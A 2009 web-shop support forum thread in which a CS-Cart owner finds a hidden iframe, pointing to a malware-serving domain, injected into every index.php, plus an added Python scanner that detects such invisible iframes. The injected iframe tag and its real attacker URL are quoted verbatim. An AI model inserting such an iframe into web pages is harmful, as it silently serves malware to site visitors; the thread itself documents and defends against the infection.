http://nameashop.cn/in.cgi?income33

 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 06 April 2009 - 05:58 AM #1

Hi there,

I observed something weird with my site this morning. There is a piece of code in the storefront and admin which should not be there.

<iframe src="http://nameashop.cn/in.cgi?income33" width=1 height=1 style="visibility: hidden"></iframe>

<iframe src="http://nameashop.cn/in.cgi?income33" width=1 height=1 style="visibility: hidden"></iframe>

Does anyone know what this is about? Is my PC infected (I have nod32, which says that I'm clean) or is it something on my server?

I would appreciate any answer,
Thanks

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 06:38 AM #2

Check this link...
http://www.malwaredo...ch=nameashop.cn

I would remove it and have a word with your server host.

Barry

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 06 April 2009 - 07:41 AM #3

> Check this link...
> http://www.malwaredo...ch=nameashop.cn
>
> I would remove it and have a word with your server host.
>
> Barry


I would remove it too, but I haven't found it yet in any files. I can see it only when I look at the source code from the browser. It is placed before any other code.

Thanks

I found it in index.php in root.
I'm not sure if this could be an issue with my host or with cs-cart.

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 08:24 AM #4

hi

It is probably both. It looks like a hack and firstly I would go to your host for help.

They should be able to advise you of what to do.

I am not an expert at all so can't offer much more.

Barry



 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 08:26 AM #5

I assume you are new?

Have you got ALL your permissions set correctly?

Barry



 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 06 April 2009 - 08:36 AM #6

> hi
>
> It is probably both. It looks like a hack and firstly I would go to your host for help.
>
> They should be able to advise you of what to do.
>
> I am not an expert at all so can't offer much more.
>
> Barry


Thanks a lot.

As I expected, my hosting provider said that this issue comes from my platform, not hosting. The problem is that I deleted the code from index.php but it is still visible.

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 08:45 AM #7

> I assume you are new?
>
> Have you got ALL your permissions set correctly?



It will all depend on the answer to this.

You may need to restore to a previous date that does not have the OFFENDING script.

But you MUST check your permissions as per the installation instructions, remove Install.php and rename Admin.php

Barry



 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 08:47 AM #8

> The problem is that I deleted the code from index.php but it is still visible.


This means it is planted elsewhere!!!!!!!!!



 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 06 April 2009 - 09:33 AM #9

> This means it is planted elsewhere!!!!!!!!!


So...
All my permissions were set correctly.

I found the code in every index.php on my site. I deleted the code and I see that it's ok for now.

Thanks a lot again

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 06 April 2009 - 09:48 AM #10

That's great news, but I have concerns that if......

someone has been able to plant that code, they and others can plant more.

I don't quite understand how they have been able to do this?

Don't know what to advise, but it is quite serious.

Barry



 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 06 April 2009 - 11:47 AM #11

I would bet money that every one of your files named "index.php", no matter what folder, has this script in it.

I had a similar situation with a Wordpress install once, all my index files had an iframe inserted.

Had to go through every file and then of course change permissions and usernames/passwords, etc, etc.
Pimpin' skins since v1.0
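
The post above describes going through every file by hand. As an added example (not from the thread or from CS-Cart), this scanner walks a web root and reports every file containing an invisible iframe of the shape shown in the first post; the function names, the extension list and the placeholder host `injected.example` are assumptions made for the example.

```python
import os
import re
import sys
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# Invisible-frame markers: 0/1 pixel width or height, or a hiding style.
TINY_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?[01](?:px)?["']?(?=[\s>/])""", re.I)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
SCAN_EXT = (".php", ".html", ".htm", ".tpl", ".js")

# Constructed sample: same attribute shape as the tag in the first post,
# with a placeholder host instead of the real one.
SAMPLE = ('<iframe src="http://injected.example/in.cgi?x" width=1 height=1 '
          'style="visibility: hidden"></iframe>\n<?php // original file ?>\n')


def scan_text(text):
    """Return (line_no, src_host) for each invisible iframe in text."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if TINY_RE.search(tag) or HIDDEN_RE.search(tag):
            src = SRC_RE.search(tag)
            host = urlparse(src.group(1)).hostname if src else None
            hits.append((text.count("\n", 0, m.start()) + 1, host))
    return hits


def scan_tree(root):
    """Walk root; return {relative_path: hits} for files holding such iframes."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report


if __name__ == "__main__":
    # With a path argument, scan that web root; otherwise scan the sample.
    result = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_text(SAMPLE)
    print(result)
```

The output is a cleanup list only: it shows where the tag sits, not how it was written there, so the password and permission changes mentioned in the post are still needed.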

 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 10 April 2009 - 04:45 AM #12

> I would bet money that every one of your files named "index.php", no matter what folder, has this script in it.
>
> I had a similar situation with a Wordpress install once, all my index files had an iframe inserted.
>
> Had to go through every file and then of course change permissions and usernames/passwords, etc, etc.


That's what I wrote... that every index.php file was "infected" with this iframe.

I noticed later (thanks to nod32) that this link http:// nameashop .cn/in.cgi? income33 goes to a PDF file infected with the /Exploit.Agent.AFH trojan.

Anyway, I'm pretty sure that this is a cs-cart bug because all my permissions were set correctly and definitely no one has access to my site.

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 11 April 2009 - 01:10 PM #13

it "could" be, are you on shared hosting? or have any other scripts on the box?

 
  • hmf
  • Junior Member
  • Members
  • Join Date: 01-Feb 08
  • 19 posts

Posted 13 April 2009 - 10:19 AM #14

> it "could" be, are you on shared hosting? or have any other scripts on the box?


Unfortunately we are on a shared server. But we have already prepared our own dedicated server for our site and we will "launch" it as soon as cs-cart v.2 is stable.